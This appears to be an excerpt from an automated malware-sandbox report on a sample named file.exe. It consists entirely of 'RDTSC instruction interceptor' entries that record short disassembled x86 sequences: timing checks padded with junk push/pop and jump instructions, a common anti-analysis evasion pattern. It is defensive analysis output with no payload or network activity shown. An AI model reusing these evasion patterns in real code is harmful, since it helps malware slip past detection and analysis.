Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC331 second address: ACC33B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC809 second address: ACC80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC80D second address: ACC825 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFD08B70883h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC98A second address: ACC990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC990 second address: ACC996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC996 second address: ACC9A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD08D543FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC9A0 second address: ACC9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACCB21 second address: ACCB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACCB29 second address: ACCB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACCB2D second address: ACCB37 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD08D543F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACCB37 second address: ACCB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACCC9F second address: ACCCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08D54409h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD06B5 second address: AD06D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B7087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD084E second address: AD085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08D543FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3817 second address: AD3823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD08B70876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3823 second address: AD382C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD382C second address: AD3832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3832 second address: AD3836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3836 second address: AD383C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD383C second address: AD3848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFD08D543F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3848 second address: AD384C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD384C second address: AD3852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3852 second address: AD385B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8BB1 second address: AD8BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD08D54401h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8BC7 second address: AD8BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70882h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD08B70885h 0x00000013 jnp 00007EFD08B70876h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8BFD second address: AD8C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8C0B second address: AD8C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD08B70881h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8C25 second address: AD8C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8C29 second address: AD8C33 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD08B70876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8D6A second address: AD8D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D543FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007EFD08D543F8h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007EFD08D543F6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8D92 second address: AD8D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8ED2 second address: AD8F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007EFD08D54406h 0x0000000a push eax 0x0000000b jmp 00007EFD08D54406h 0x00000010 jmp 00007EFD08D54401h 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8F1C second address: AD8F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8F26 second address: AD8F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFD08D54405h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8F40 second address: AD8F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD90F1 second address: AD9109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54402h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9109 second address: AD910D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD910D second address: AD9111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9255 second address: AD925B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD925B second address: AD9272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007EFD08D543F6h 0x0000000e popad 0x0000000f jo 00007EFD08D543FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8756C second address: A875E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD08B7088Bh 0x00000008 jmp 00007EFD08B70885h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007EFD08B7087Ch 0x00000016 push ecx 0x00000017 jmp 00007EFD08B7087Ch 0x0000001c pop ecx 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007EFD08B70878h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D2A02h] 0x0000003f push 00000004h 0x00000041 jmp 00007EFD08B70881h 0x00000046 nop 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9653 second address: AD9658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADEBC5 second address: ADEBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007EFD08B70876h 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE397 second address: ADE39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE39B second address: ADE3A5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD08B70876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE3A5 second address: ADE3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007EFD08D54406h 0x0000000c jmp 00007EFD08D543FAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE4EB second address: ADE4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE325C second address: AE3268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE3268 second address: AE3278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007EFD08B70876h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE3278 second address: AE327E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE327E second address: AE3284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE3284 second address: AE3290 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD08D543FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C410 second address: A3C419 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE941F second address: AE944A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFD08D543FBh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE95A7 second address: AE95B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007EFD08B70876h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9970 second address: AE9992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54408h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA24D second address: AEA279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jl 00007EFD08B70892h 0x00000014 jmp 00007EFD08B70886h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA279 second address: AEA280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA280 second address: AEA288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA886 second address: AEA88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA88A second address: AEA890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAE83 second address: AEAE9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D543FCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAE9C second address: AEAEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAEA0 second address: AEAEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D543FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB203 second address: AEB207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEF2EB second address: AEF2FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD08D543FBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEF2FC second address: AEF328 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007EFD08B70889h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007EFD08B70876h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEF328 second address: AEF346 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007EFD08D543FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007EFD08D543F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE6E2 second address: AEE6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE6E8 second address: AEE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE6EC second address: AEE732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70881h 0x00000007 jmp 00007EFD08B7087Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jnp 00007EFD08B70876h 0x0000001b pop edx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f jmp 00007EFD08B7087Bh 0x00000024 jp 00007EFD08B70876h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE732 second address: AEE737 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE737 second address: AEE74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD08B7087Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE74B second address: AEE74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEEA19 second address: AEEA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEED3D second address: AEED5C instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD08D543F6h 0x00000008 jmp 00007EFD08D54402h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEED5C second address: AEED64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4305D second address: A43086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFD08D543FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB9C1 second address: AFB9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD08B70876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB9CB second address: AFB9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB9CF second address: AFB9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB9DF second address: AFB9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB9E5 second address: AFB9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB9EA second address: AFBA1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD08D54406h 0x00000008 jmp 00007EFD08D54405h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBA1C second address: AFBA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBCFC second address: AFBD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007EFD08D54409h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBE6B second address: AFBE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBFA7 second address: AFBFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC12E second address: AFC139 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC43D second address: AFC443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC443 second address: AFC499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD08B70876h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007EFD08B70885h 0x00000011 jmp 00007EFD08B7087Ch 0x00000016 pop ecx 0x00000017 jp 00007EFD08B7087Ch 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007EFD08B70887h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC499 second address: AFC4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFD08D54404h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFD43A second address: AFD45E instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD08B70878h 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007EFD08B70878h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 js 00007EFD08B70888h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jne 00007EFD08B70876h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0311F second address: B03143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007EFD08D543F6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B02B3E second address: B02B4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD08B70878h 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B02B4D second address: B02B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
